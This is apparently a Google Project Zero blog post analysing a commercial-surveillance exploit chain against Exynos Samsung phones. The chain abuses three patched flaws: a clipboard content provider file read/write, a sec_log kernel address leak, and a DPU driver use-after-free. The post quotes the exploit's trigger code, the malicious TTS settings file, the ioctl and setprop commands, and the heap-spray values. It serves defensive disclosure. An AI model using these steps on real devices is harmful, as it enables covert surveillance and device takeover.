Normal view

There are new articles available, click to refresh the page.
Before yesterdayGoogle Project Zero

A Very Powerful Clipboard: Analysis of a Samsung in-the-wild exploit chain

4 November 2022 at 15:50

Posted by Maddie Stone, Project Zero

Note: The three vulnerabilities discussed in this blog were all fixed in Samsung’s March 2021 release. They were fixed as CVE-2021-25337, CVE-2021-25369, CVE-2021-25370. To ensure your Samsung device is up-to-date under settings you can check that your device is running SMR Mar-2021 or later.

As defenders, in-the-wild exploit samples give us important insight into what attackers are really doing. We get the “ground truth” data about the vulnerabilities and exploit techniques they’re using, which then informs our further research and guidance to security teams on what could have the biggest impact or return on investment. To do this, we need to know that the vulnerabilities and exploit samples were found in-the-wild. Over the past few years there’s been tremendous progress in vendor’s transparently disclosing when a vulnerability is known to be exploited in-the-wild: Adobe, Android, Apple, ARM, Chrome, Microsoft, Mozilla, and others are sharing this information via their security release notes.

While we understand that Samsung has yet to annotate any vulnerabilities as in-the-wild, going forward, Samsung has committed to publicly sharing when vulnerabilities may be under limited, targeted exploitation, as part of their release notes.

We hope that, like Samsung, others will join their industry peers in disclosing when there is evidence to suggest that a vulnerability is being exploited in-the-wild in one of their products.

The exploit sample

The Google Threat Analysis Group (TAG) obtained a partial exploit chain for Samsung devices that TAG believes belonged to a commercial surveillance vendor. These exploits were likely discovered in the testing phase. The sample is from late 2020. The chain merited further analysis because it is a 3 vulnerability chain where all 3 vulnerabilities are within Samsung custom components, including a vulnerability in a Java component. This exploit analysis was completed in collaboration with Clement Lecigne from TAG.

The sample used three vulnerabilities, all patched in March 2021 by Samsung:

  1. Arbitrary file read/write via the clipboard provider - CVE-2021-25337
  2. Kernel information leak via sec_log - CVE-2021-25369
  3. Use-after-free in the Display Processing Unit (DPU) driver - CVE-2021-25370

The exploit sample targets Samsung phones running kernel 4.14.113 with the Exynos SOC. Samsung phones run one of two types of SOCs depending on where they’re sold. For example the Samsung phones sold in the United States, China, and a few other countries use a Qualcomm SOC and phones sold most other places (ex. Europe and Africa) run an Exynos SOC. The exploit sample relies on both the Mali GPU driver and the DPU driver which are specific to the Exynos Samsung phones.

Examples of Samsung phones that were running kernel 4.14.113 in late 2020 (when this sample was found) include the S10, A50, and A51.

The in-the-wild sample that was obtained is a JNI native library file that would have been loaded as a part of an app. Unfortunately TAG did not obtain the app that would have been used with this library. Getting initial code execution via an application is a path that we’ve seen in other campaigns this year. TAG and Project Zero published detailed analyses of one of these campaigns in June.

Vulnerability #1 - Arbitrary filesystem read and write

The exploit chain used CVE-2021-25337 for an initial arbitrary file read and write. The exploit is running as the untrusted_app SELinux context, but uses the system_server SELinux context to open files that it usually wouldn’t be able to access. This bug was due to a lack of access control in a custom Samsung clipboard provider that runs as the system user.

Screenshot of the CVE-2021-25337 entry from Samsung's March 2021 security update. It reads: "SVE-2021-19527 (CVE-2021-25337): Arbitrary file read/write vulnerability via unprotected clipboard content provider  Severity: Moderate Affected versions: P(9.0), Q(10.0), R(11.0) devices except ONEUI 3.1 in R(11.0) Reported on: November 3, 2020 Disclosure status: Privately disclosed. An improper access control in clipboard service prior to SMR MAR-2021 Release 1 allows untrusted applications to read or write arbitrary files in the device. The patch adds the proper caller check to prevent improper access to clipboard service.

About Android content providers

In Android, Content Providers manage the storage and system-wide access of different data. Content providers organize their data as tables with columns representing the type of data collected and the rows representing each piece of data. Content providers are required to implement six abstract methods: query, insert, update, delete, getType, and onCreate. All of these methods besides onCreate are called by a client application.

According to the Android documentation:


All applications can read from or write to your provider, even if the underlying data is private, because by default your provider does not have permissions set. To change this, set permissions for your provider in your manifest file, using attributes or child elements of the <provider> element. You can set permissions that apply to the entire provider, or to certain tables, or even to certain records, or all three.

The vulnerability

Samsung created a custom clipboard content provider that runs within the system server. The system server is a very privileged process on Android that manages many of the services critical to the functioning of the device, such as the WifiService and TimeZoneDetectorService. The system server runs as the privileged system user (UID 1000, AID_system) and under the system_server SELinux context.

Samsung added a custom clipboard content provider to the system server. This custom clipboard provider is specifically for images. In the com.android.server.semclipboard.SemClipboardProvider class, there are the following variables:


        DATABASE_NAME = ‘clipboardimage.db’

        TABLE_NAME = ‘ClipboardImageTable’

        URL = ‘content://com.sec.android.semclipboardprovider/images’

        CREATE_TABLE = " CREATE TABLE ClipboardImageTable (id INTEGER PRIMARY KEY AUTOINCREMENT,  _data TEXT NOT NULL);";

Unlike content providers that live in “normal” apps and can restrict access via permissions in their manifest as explained above, content providers in the system server are responsible for restricting access in their own code. The system server is a single JAR (services.jar) on the firmware image and doesn’t have a manifest for any permissions to go in. Therefore it’s up to the code within the system server to do its own access checking.

UPDATE 10 Nov 2022: The system server code is not an app in its own right. Instead its code lives in a JAR, services.jar. Its manifest is found in /system/framework/framework-res.apk. In this case, the entry for the SemClipboardProvider in the manifest is:

<provider android:name="com.android.server.semclipboard.SemClipboardProvider" android:enabled="true" android:exported="true" android:multiprocess="false" android:authorities="com.sec.android.semclipboardprovider" android:singleUser="true"/>

Like “normal” app-defined components, the system server could use the android:permission attribute to control access to the provider, but it does not. Since there is not a permission required to access the SemClipboardProvider via the manifest, any access control must come from the provider code itself. Thanks to Edward Cunningham for pointing this out!

The ClipboardImageTable defines only two columns for the table as seen above: id and _data. The column name _data has a special use in Android content providers. It can be used with the openFileHelper method to open a file at a specified path. Only the URI of the row in the table is passed to openFileHelper and a ParcelFileDescriptor object for the path stored in that row is returned. The ParcelFileDescriptor class then provides the getFd method to get the native file descriptor (fd) for the returned ParcelFileDescriptor.

    public Uri insert(Uri uri, ContentValues values) {

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

The function above is the vulnerable insert() method in com.android.server.semclipboard.SemClipboardProvider. There is no access control included in this function so any app, including the untrusted_app SELinux context, can modify the _data column directly. By calling insert, an app can open files via the system server that it wouldn’t usually be able to open on its own.

The exploit triggered the vulnerability with the following code from an untrusted application on the device. This code returned a raw file descriptor.

ContentValues vals = new ContentValues();

vals.put("_data", "/data/system/users/0/newFile.bin");

URI semclipboard_uri = URI.parse("content://com.sec.android.semclipboardprovider")

ContentResolver resolver = getContentResolver();

URI newFile_uri = resolver.insert(semclipboard_uri, vals);

return resolver.openFileDescriptor(newFile_uri, "w").getFd(); 

Let’s walk through what is happening line by line:

  1. Create a ContentValues object. This holds the key, value pair that the caller wants to insert into a provider’s database table. The key is the column name and the value is the row entry.
  2. Set the ContentValues object: the key is set to “_data” and the value to an arbitrary file path, controlled by the exploit.
  3. Get the URI to access the semclipboardprovider. This is set in the SemClipboardProvider class.
  4. Get the ContentResolver object that allows apps access to ContentProviders.
  5. Call insert on the semclipboardprovider with our key-value pair.
  6. Open the file that was passed in as the value and return the raw file descriptor. openFileDescriptor calls the content provider’s openFile, which in this case simply calls openFileHelper.

The exploit wrote their next stage binary to the directory /data/system/users/0/. The dropped file will have an SELinux context of users_system_data_file. Normal untrusted_app’s don’t have access to open or create users_system_data_file files so in this case they are proxying the open through system_server who can open users_system_data_file. While untrusted_app can’t open users_system_data_file, it can read and write to users_system_data_file. Once the clipboard content provider opens the file and passess the fd to the calling process, the calling process can now read and write to it.

The exploit first uses this fd to write their next stage ELF file onto the file system. The contents for the stage 2 ELF were embedded within the original sample.

This vulnerability is triggered three more times throughout the chain as we’ll see below.

Fixing the vulnerability

To fix the vulnerability, Samsung added access checks to the functions in the SemClipboardProvider. The insert method now checks if the PID of the calling process is UID 1000, meaning that it is already also running with system privileges.

  public Uri insert(Uri uri, ContentValues values) {

        if (Binder.getCallingUid() != 1000) {

            Log.e(TAG, "Fail to insert image clip uri. blocked the access of package : " + getContext().getPackageManager().getNameForUid(Binder.getCallingUid()));

            return null;

        }

        long row = this.database.insert(TABLE_NAME, "", values);

        if (row > 0) {

            Uri newUri = ContentUris.withAppendedId(CONTENT_URI, row);

            getContext().getContentResolver().notifyChange(newUri, null);

            return newUri;

        }

        throw new SQLException("Fail to add a new record into " + uri);

    }

Executing the stage 2 ELF

The exploit has now written its stage 2 binary to the file system, but how do they load it outside of their current app sandbox? Using the Samsung Text to Speech application (SamsungTTS.apk).

The Samsung Text to Speech application (com.samsung.SMT) is a pre-installed system app running on Samsung devices. It is also running as the system UID, though as a slightly less privileged SELinux context, system_app rather than system_server. There has been at least one previously public vulnerability where this app was used to gain code execution as system. What’s different this time though is that the exploit doesn’t need another vulnerability; instead it reuses the stage 1 vulnerability in the clipboard to arbitrarily write files on the file system.

Older versions of the SamsungTTS application stored the file path for their engine in their Settings files. When a service in the application was started, it obtained the path from the Settings file and would load that file path as a native library using the System.load API.

The exploit takes advantage of this by using the stage 1 vulnerability to write its file path to the Settings file and then starting the service which will then load its stage 2 executable file as system UID and system_app SELinux context.

To do this, the exploit uses the stage 1 vulnerability to write the following contents to two different files: /data/user_de/0/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml and /data/data/com.samsung.SMT/shared_prefs/SamsungTTSSettings.xml. Depending on the version of the phone and application, the SamsungTTS app uses these 2 different paths for its Settings files.

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>

      <map>

          <string name=\"eng-USA-Variant Info\">f00</string>\n"

          <string name=\"SMT_STUBCHECK_STATUS\">STUB_SUCCESS</string>\n"

          <string name=\"SMT_LATEST_INSTALLED_ENGINE_PATH\">/data/system/users/0/newFile.bin</string>\n"

      </map>

The SMT_LATEST_INSTALLED_ENGINE_PATH is the file path passed to System.load(). To initiate the process of the system loading, the exploit stops and restarts the SamsungTTSService by sending two intents to the application. The SamsungTTSService then initiates the load and the stage 2 ELF begins executing as the system user in the system_app SELinux context.

The exploit sample is from at least November 2020. As of November 2020, some devices had a version of the SamsungTTS app that did this arbitrary file loading while others did not. App versions 3.0.04.14 and before included the arbitrary loading capability. It seems like devices released on Android 10 (Q) were released with the updated version of the SamsungTTS app which did not load an ELF file based on the path in the settings file. For example, the A51 device that launched in late 2019 on Android 10 launched with version 3.0.08.18 of the SamsungTTS app, which does not include the functionality that would load the ELF.

Phones released on Android P and earlier seemed to have a version of the app pre-3.0.08.18 which does load the executable up through December 2020. For example, the SamsungTTS app from this A50 device on the November 2020 security patch level was 3.0.03.22, which did load from the Settings file.

Once the ELF file is loaded via the System.load api, it begins executing. It includes two additional exploits to gain kernel read and write privileges as the root user.

Vulnerability #2 - task_struct and sys_call_table address leak

Once the second stage ELF is running (and as system), the exploit then continues. The second vulnerability (CVE-2021-25369) used by the chain is an information leak to leak the address of the task_struct and sys_call_table. The leaked sys_call_table address is used to defeat KASLR. The addr_limit pointer, which is used later to gain arbitrary kernel read and write, is calculated from the leaked task_struct address.

The vulnerability is in the access permissions of a custom Samsung logging file: /data/log/sec_log.log.

Screenshot of the CVE-2021-25369 entry from Samsung's March 2021 security update. It reads: &quot;SVE-2021-19897 (CVE-2021-25369): Potential kernel information exposure from sec_log  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0) Reported on: December 10, 2020 Disclosure status: Privately disclosed. An improper access control vulnerability in sec_log file prior to SMR MAR-2021 Release 1 exposes sensitive kernel information to userspace. The patch removes vulnerable file.

The exploit abused a WARN_ON in order to leak the two kernel addresses and therefore break ASLR. WARN_ON is intended to only be used in situations where a kernel bug is detected because it prints a full backtrace, including stack trace and register values, to the kernel logging buffer, /dev/kmsg.

oid __warn(const char *file, int line, void *caller, unsigned taint,

            struct pt_regs *regs, struct warn_args *args)

{

        disable_trace_on_warning();

        pr_warn("------------[ cut here ]------------\n");

        if (file)

                pr_warn("WARNING: CPU: %d PID: %d at %s:%d %pS\n",

                        raw_smp_processor_id(), current->pid, file, line,

                        caller);

        else

                pr_warn("WARNING: CPU: %d PID: %d at %pS\n",

                        raw_smp_processor_id(), current->pid, caller);

        if (args)

                vprintk(args->fmt, args->args);

        if (panic_on_warn) {

                /*

                 * This thread may hit another WARN() in the panic path.

                 * Resetting this prevents additional WARN() from panicking the

                 * system on this thread.  Other threads are blocked by the

                 * panic_mutex in panic().

                 */

                panic_on_warn = 0;

                panic("panic_on_warn set ...\n");

        }

        print_modules();

        dump_stack();

        print_oops_end_marker();

        /* Just a warning, don't kill lockdep. */

        add_taint(taint, LOCKDEP_STILL_OK);

}

On Android, the ability to read from kmsg is scoped to privileged users and contexts. While kmsg is readable by system_server, it is not readable from the system_app context, which means it’s not readable by the exploit. 

a51:/ $ ls -alZ /dev/kmsg

crw-rw---- 1 root system u:object_r:kmsg_device:s0 1, 11 2022-10-27 21:48 /dev/kmsg

$ sesearch -A -s system_server -t kmsg_device -p read precompiled_sepolicy

allow domain dev_type:lnk_file { getattr ioctl lock map open read };

allow system_server kmsg_device:chr_file { append getattr ioctl lock map open read write };

Samsung however has added a custom logging feature that copies kmsg to the sec_log. The sec_log is a file found at /data/log/sec_log.log.

The WARN_ON that the exploit triggers is in the Mali GPU graphics driver provided by ARM. ARM replaced the WARN_ON with a call to the more appropriate helper pr_warn in release BX304L01B-SW-99002-r21p0-01rel1 in February 2020. However, the A51 (SM-A515F) and A50 (SM-A505F)  still used a vulnerable version of the driver (r19p0) as of January 2021.  

/**

 * kbasep_vinstr_hwcnt_reader_ioctl() - hwcnt reader's ioctl.

 * @filp:   Non-NULL pointer to file structure.

 * @cmd:    User command.

 * @arg:    Command's argument.

 *

 * Return: 0 on success, else error code.

 */

static long kbasep_vinstr_hwcnt_reader_ioctl(

        struct file *filp,

        unsigned int cmd,

        unsigned long arg)

{

        long rcode;

        struct kbase_vinstr_client *cli;

        if (!filp || (_IOC_TYPE(cmd) != KBASE_HWCNT_READER))

                return -EINVAL;

        cli = filp->private_data;

        if (!cli)

                return -EINVAL;

        switch (cmd) {

        case KBASE_HWCNT_READER_GET_API_VERSION:

                rcode = put_user(HWCNT_READER_API, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_HWVER:

                rcode = kbasep_vinstr_hwcnt_reader_ioctl_get_hwver(

                        cli, (u32 __user *)arg);

                break;

        case KBASE_HWCNT_READER_GET_BUFFER_SIZE:

                rcode = put_user(

                        (u32)cli->vctx->metadata->dump_buf_bytes,

                        (u32 __user *)arg);

                break;

       

        [...]

        default:

                WARN_ON(true);

                rcode = -EINVAL;

                break;

        }

        return rcode;

}

Specifically the WARN_ON is in the function kbase_vinstr_hwcnt_reader_ioctl. To trigger, the exploit only needs to call an invalid ioctl number for the HWCNT driver and the WARN_ON will be hit. The exploit makes two ioctl calls: the first is the Mali driver’s HWCNT_READER_SETUP ioctl to initialize the hwcnt driver and be able to call ioctl’s and then to the hwcnt ioctl target with an invalid ioctl number: 0xFE.

   hwcnt_fd = ioctl(dev_mali_fd, 0x40148008, &v4);

   ioctl(hwcnt_fd, 0x4004BEFE, 0);

To trigger the vulnerability the exploit sends an invalid ioctl to the HWCNT driver a few times and then triggers a bug report by calling:

setprop dumpstate.options bugreportfull;

setprop ctl.start bugreport;

In Android, the property ctl.start starts a service that is defined in init. On the targeted Samsung devices, the SELinux policy for who has access to the ctl.start property is much more permissive than AOSP’s policy. Most notably in this exploit’s case, system_app has access to set ctl_start and thus initiate the bugreport.

allow at_distributor ctl_start_prop:file { getattr map open read };

allow at_distributor ctl_start_prop:property_service set;

allow bootchecker ctl_start_prop:file { getattr map open read };

allow bootchecker ctl_start_prop:property_service set;

allow dumpstate property_type:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:file { getattr map open read };

allow hal_keymaster_default ctl_start_prop:property_service set;

allow ikev2_client ctl_start_prop:file { getattr map open read };

allow ikev2_client ctl_start_prop:property_service set;

allow init property_type:file { append create getattr map open read relabelto rename setattr unlink write };

allow init property_type:property_service set;

allow keystore ctl_start_prop:file { getattr map open read };

allow keystore ctl_start_prop:property_service set;

allow mediadrmserver ctl_start_prop:file { getattr map open read };

allow mediadrmserver ctl_start_prop:property_service set;

allow multiclientd ctl_start_prop:file { getattr map open read };

allow multiclientd ctl_start_prop:property_service set;

allow radio ctl_start_prop:file { getattr map open read };

allow radio ctl_start_prop:property_service set;

allow shell ctl_start_prop:file { getattr map open read };

allow shell ctl_start_prop:property_service set;

allow surfaceflinger ctl_start_prop:file { getattr map open read };

allow surfaceflinger ctl_start_prop:property_service set;

allow system_app ctl_start_prop:file { getattr map open read };

allow system_app ctl_start_prop:property_service set;

allow system_server ctl_start_prop:file { getattr map open read };

allow system_server ctl_start_prop:property_service set;

allow vold ctl_start_prop:file { getattr map open read };

allow vold ctl_start_prop:property_service set;

allow wlandutservice ctl_start_prop:file { getattr map open read };

allow wlandutservice ctl_start_prop:property_service set;

The bugreport service is defined in /system/etc/init/dumpstate.rc:

service bugreport /system/bin/dumpstate -d -p -B -z \

        -o /data/user_de/0/com.android.shell/files/bugreports/bugreport

    class main

    disabled

    oneshot

The bugreport service in dumpstate.rc is a Samsung-specific customization. The AOSP version of dumpstate.rc doesn’t include this service.

The Samsung version of the dumpstate (/system/bin/dumpstate) binary then copies everything from /proc/sec_log to /data/log/sec_log.log as shown in the pseudo-code below. This is the first few lines of the dumpstate() function within the dumpstate binary. The dump_sec_log (symbols included within the binary) function copies everything from the path provided in argument two to the path provided in argument three.

  _ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2));

  LOBYTE(s) = 18;

  v650[0] = 0LL;

  s_8 = 17664LL;

  *(char **)((char *)&s + 1) = *(char **)"DUMPSTATE";

  DurationReporter::DurationReporter(v636, (__int64)&s, 0);

  if ( ((unsigned __int8)s & 1) != 0 )

    operator delete(v650[0]);

  dump_sec_log("SEC LOG", "/proc/sec_log", "/data/log/sec_log.log");

After starting the bugreport service, the exploit uses inotify to monitor for IN_CLOSE_WRITE events in the /data/log/ directory. IN_CLOSE_WRITE triggers when a file that was opened for writing is closed. So this watch will occur when dumpstate is finished writing to sec_log.log.

An example of the sec_log.log file contents generated after hitting the WARN_ON statement is shown below. The exploit combs through the file contents looking for two values on the stack that are at address *b60 and *bc0: the task_struct and the sys_call_table address.

<4>[90808.635627]  [4:    poc:25943] ------------[ cut here ]------------

<4>[90808.635654]  [4:    poc:25943] WARNING: CPU: 4 PID: 25943 at drivers/gpu/arm/b_r19p0/mali_kbase_vinstr.c:992 kbasep_vinstr_hwcnt_reader_ioctl+0x36c/0x664

<4>[90808.635663]  [4:    poc:25943] Modules linked in:

<4>[90808.635675]  [4:    poc:25943] CPU: 4 PID: 25943 Comm: poc Tainted: G        W       4.14.113-20034833 #1

<4>[90808.635682]  [4:    poc:25943] Hardware name: Samsung BEYOND1LTE EUR OPEN 26 board based on EXYNOS9820 (DT)

<4>[90808.635689]  [4:    poc:25943] Call trace:

<4>[90808.635701]  [4:    poc:25943] [<0000000000000000>] dump_backtrace+0x0/0x280

<4>[90808.635710]  [4:    poc:25943] [<0000000000000000>] show_stack+0x18/0x24

<4>[90808.635720]  [4:    poc:25943] [<0000000000000000>] dump_stack+0xa8/0xe4

<4>[90808.635731]  [4:    poc:25943] [<0000000000000000>] __warn+0xbc/0x164tv

<4>[90808.635738]  [4:    poc:25943] [<0000000000000000>] report_bug+0x15c/0x19c

<4>[90808.635746]  [4:    poc:25943] [<0000000000000000>] bug_handler+0x30/0x8c

<4>[90808.635753]  [4:    poc:25943] [<0000000000000000>] brk_handler+0x94/0x150

<4>[90808.635760]  [4:    poc:25943] [<0000000000000000>] do_debug_exception+0xc8/0x164

<4>[90808.635766]  [4:    poc:25943] Exception stack(0xffffff8014c2bb40 to 0xffffff8014c2bc80)

<4>[90808.635775]  [4:    poc:25943] bb40: ffffffc91b00fa40 000000004004befe 0000000000000000 0000000000000000

<4>[90808.635781]  [4:    poc:25943] bb60: ffffffc061b65800 000000000ecc0408 000000000000000a 000000000000000a

<4>[90808.635789]  [4:    poc:25943] bb80: 000000004004be30 000000000000be00 ffffffc86b49d700 000000000000000b

<4>[90808.635796]  [4:    poc:25943] bba0: ffffff8014c2bdd0 0000000080000000 0000000000000026 0000000000000026

<4>[90808.635802]  [4:    poc:25943] bbc0: ffffff8008429834 000000000041bd50 0000000000000000 0000000000000000

<4>[90808.635809]  [4:    poc:25943] bbe0: ffffffc88b42d500 ffffffffffffffea ffffffc96bda5bc0 0000000000000004

<4>[90808.635816]  [4:    poc:25943] bc00: 0000000000000000 0000000000000124 000000000000001d ffffff8009293000

<4>[90808.635823]  [4:    poc:25943] bc20: ffffffc89bb6b180 ffffff8014c2bdf0 ffffff80084294bc ffffff8014c2bd80

<4>[90808.635829]  [4:    poc:25943] bc40: ffffff800885014c 0000000020400145 0000000000000008 0000000000000008

<4>[90808.635836]  [4:    poc:25943] bc60: 0000007fffffffff 0000000000000001 ffffff8014c2bdf0 ffffff800885014c

<4>[90808.635843]  [4:    poc:25943] [<0000000000000000>] el1_dbg+0x18/0x74

The file /data/log/sec_log.log has the SELinux context dumplog_data_file which is widely accessible to many apps as shown below. The exploit is currently running within the SamsungTTS app which is the system_app SELinux context. While the exploit does not have access to /dev/kmsg due to SELinux access controls, it can access the same contents when they are copied to the sec_log.log which has more permissive access.

$ sesearch -A -t dumplog_data_file -c file -p open precompiled_sepolicy | grep _app

allow aasa_service_app dumplog_data_file:file { getattr ioctl lock map open read };

allow dualdar_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow platform_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow priv_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow system_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow teed_app dumplog_data_file:file { append create getattr ioctl lock map open read rename setattr unlink write };

allow vzwfiltered_untrusted_app dumplog_data_file:file { getattr ioctl lock map open read };

Fixing the vulnerability

There were a few different changes to address this vulnerability:

  • Modified the dumpstate binary on the device – As of the March 2021 update, dumpstate no longer writes to /data/log/sec_log.log.
  • Removed the bugreport service from dumpstate.rc.

In addition there were a few changes made earlier in 2020 that when included would prevent this vulnerability in the future:

  • As mentioned above, in February 2020 ARM had released version r21p0 of the Mali driver which had replaced the WARN_ON with the more appropriate pr_warn which does not log a full backtrace. The March 2021 Samsung firmware included updating from version r19p0 of the Mali driver to r26p0 which used pr_warn instead of WARN_ON.
  • In April 2020, upstream Linux made a change to no longer include raw stack contents in kernel backtraces.

Vulnerability #3 - Arbitrary kernel read and write

The final vulnerability in the chain (CVE-2021-25370) is a use-after-free of a file struct in the Display and Enhancement Controller (DECON) Samsung driver for the Display Processing Unit (DPU). According to the upstream commit message, DECON is responsible for creating the video signals from pixel data. This vulnerability is used to gain arbitrary kernel read and write access.

Screenshot of the CVE-2021-25370 entry from Samsung's March 2021 security update. It reads: &quot;SVE-2021-19925 (CVE-2021-25370): Memory corruption in dpu driver  Severity: Moderate Affected versions: O(8.x), P(9.0), Q(10.0), R(11.0) devices with selected Exynos chipsets Reported on: December 12, 2020 Disclosure status: Privately disclosed. An incorrect implementation handling file descriptor in dpu driver prior to SMR Mar-2021 Release 1 results in memory corruption leading to kernel panic. The patch fixes incorrect implementation in dpu driver to address memory corruption.

Find the PID of android.hardware.graphics.composer

To be able to trigger the vulnerability the exploit needs an fd for the driver in order to send ioctl calls. To find the fd, the exploit has to to iterate through the fd proc directory for the target process. Therefore the exploit first needs to find the PID for the graphics process.

The exploit connects to LogReader which listens at /dev/socket/logdr. When a client connects to LogReader, LogReader writes the log contents back to the client. The exploit then configures LogReader to send it logs for the main log buffer (0), system log buffer (3), and the crash log buffer (4) by writing back to LogReader via the socket:

stream lids=0,3,4

The exploit then monitors the log contents until it sees the words ‘display’ or ‘SDM’. Once it finds a ‘display’ or ‘SDM’ log entry, the exploit then reads the PID from that log entry.

Now it has the PID of android.hardware.graphics.composer, where android.hardware.graphics composer is the Hardware Composer HAL.

Next the exploit needs to find the full file path for the DECON driver. The full file path can exist in a few different places on the filesystem so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains “graphics/fb0”, the DECON driver. It uses readlink to find the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get the raw file descriptor for the DECON driver path.

Triggering the Use-After-Free

The vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A “fence” is used for sharing buffers and synchronizing access between drivers and different processes.

/**

 * struct sync_file - sync file to export to the userspace

 * @file:               file representing this fence

 * @sync_file_list:     membership in global file list

 * @wq:                 wait queue for fence signaling

 * @fence:              fence with the fences in the sync_file

 * @cb:                 fence callback information

 */

struct sync_file {

        struct file             *file;

        /**

         * @user_name:

         *

         * Name of the sync file provided by userspace, for merged fences.

         * Otherwise generated through driver callbacks (in which case the

         * entire array is 0).

         */

        char                    user_name[32];

#ifdef CONFIG_DEBUG_FS

        struct list_head        sync_file_list;

#endif

        wait_queue_head_t       wq;

        unsigned long           flags;

        struct dma_fence        *fence;

        struct dma_fence_cb cb;

};

The driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.

static int decon_set_win_config(struct decon_device *decon,

                struct decon_win_config_data *win_data)

{

        int num_of_window = 0;

        struct decon_reg_data *regs;

        struct sync_file *sync_file;

        int i, j, ret = 0;

[...]

        num_of_window = decon_get_active_win_count(decon, win_data);

        if (num_of_window) {

                win_data->retire_fence = decon_create_fence(decon, &sync_file);

                if (win_data->retire_fence < 0)

                        goto err_prepare;

        } else {

[...]

        if (num_of_window) {

                fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }

[...]

        return ret;

}

In this case, decon_set_win_config acquires the fd for retire_fence in decon_create_fence.

int decon_create_fence(struct decon_device *decon, struct sync_file **sync_file)

{

        struct dma_fence *fence;

        int fd = -EMFILE;

        fence = kzalloc(sizeof(*fence), GFP_KERNEL);

        if (!fence)

                return -ENOMEM;

        dma_fence_init(fence, &decon_fence_ops, &decon->fence.lock,

                   decon->fence.context,

                   atomic_inc_return(&decon->fence.timeline));

        *sync_file = sync_file_create(fence);

        dma_fence_put(fence);

        if (!(*sync_file)) {

                decon_err("%s: failed to create sync file\n", __func__);

                return -ENOMEM;

        }

        fd = decon_get_valid_fd();

        if (fd < 0) {

                decon_err("%s: failed to get unused fd\n", __func__);

                fput((*sync_file)->file);

        }

        return fd;

}

The function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct. 

void decon_create_release_fences(struct decon_device *decon,

                struct decon_win_config_data *win_data,

                struct sync_file *sync_file)

{

        int i = 0;

        for (i = 0; i < decon->dt.max_win; i++) {

                int state = win_data->config[i].state;

                int rel_fence = -1;

                if (state == DECON_WIN_STATE_BUFFER) {

                        rel_fence = decon_get_valid_fd();

                        if (rel_fence < 0) {

                                decon_err("%s: failed to get unused fd\n",

                                                __func__);

                                goto err;

                        }

                        fd_install(rel_fence, get_file(sync_file->file));

                }

                win_data->config[i].rel_fence = rel_fence;

        }

        return;

err:

        while (i-- > 0) {

                if (win_data->config[i].state == DECON_WIN_STATE_BUFFER) {

                        put_unused_fd(win_data->config[i].rel_fence);

                        win_data->config[i].rel_fence = -1;

                }

        }

        return;

}

decon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.

When decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.

Fixing the vulnerability

Samsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.

        if (num_of_window) {

-               fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }

        decon_hiber_block(decon);

        mutex_lock(&decon->up.lock);

        list_add_tail(&regs->list, &decon->up.list);

+       atomic_inc(&decon->up.remaining_frame);

        decon->update_regs_list_cnt++;

+       win_data->extra.remained_frames = atomic_read(&decon->up.remaining_frame);

        mutex_unlock(&decon->up.lock);

        kthread_queue_work(&decon->up.worker, &decon->up.work);

+       /*

+        * The code is moved here because the DPU driver may get a wrong fd

+        * through the released file pointer,

+        * if the user(HWC) closes the fd and releases the file pointer.

+        *

+        * Since the user land can use fd from this point/time,

+        * it can be guaranteed to use an unreleased file pointer

+        * when creating a rel_fence in decon_create_release_fences(...)

+        */

+       if (num_of_window)

+               fd_install(win_data->retire_fence, sync_file->file);

        mutex_unlock(&decon->lock);

Heap Grooming and Spray

To groom the heap the exploit first opens and closes 30,000+ files using memfd_create. Then, the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these new, fake file structs, the exploit sets four of the members:

fake_file.f_u = 0x1010101;

fake_file.f_op = kaddr - 0x2071B0+0x1094E80;

fake_file.f_count = 0x7F;

fake_file.private_data = addr_limit_ptr;

The f_op member is set to the signalfd_op for reasons we will cover below in the “Overwriting the addr_limit” section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address also leaked using vulnerability #2.

The exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver.

/**

 * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel

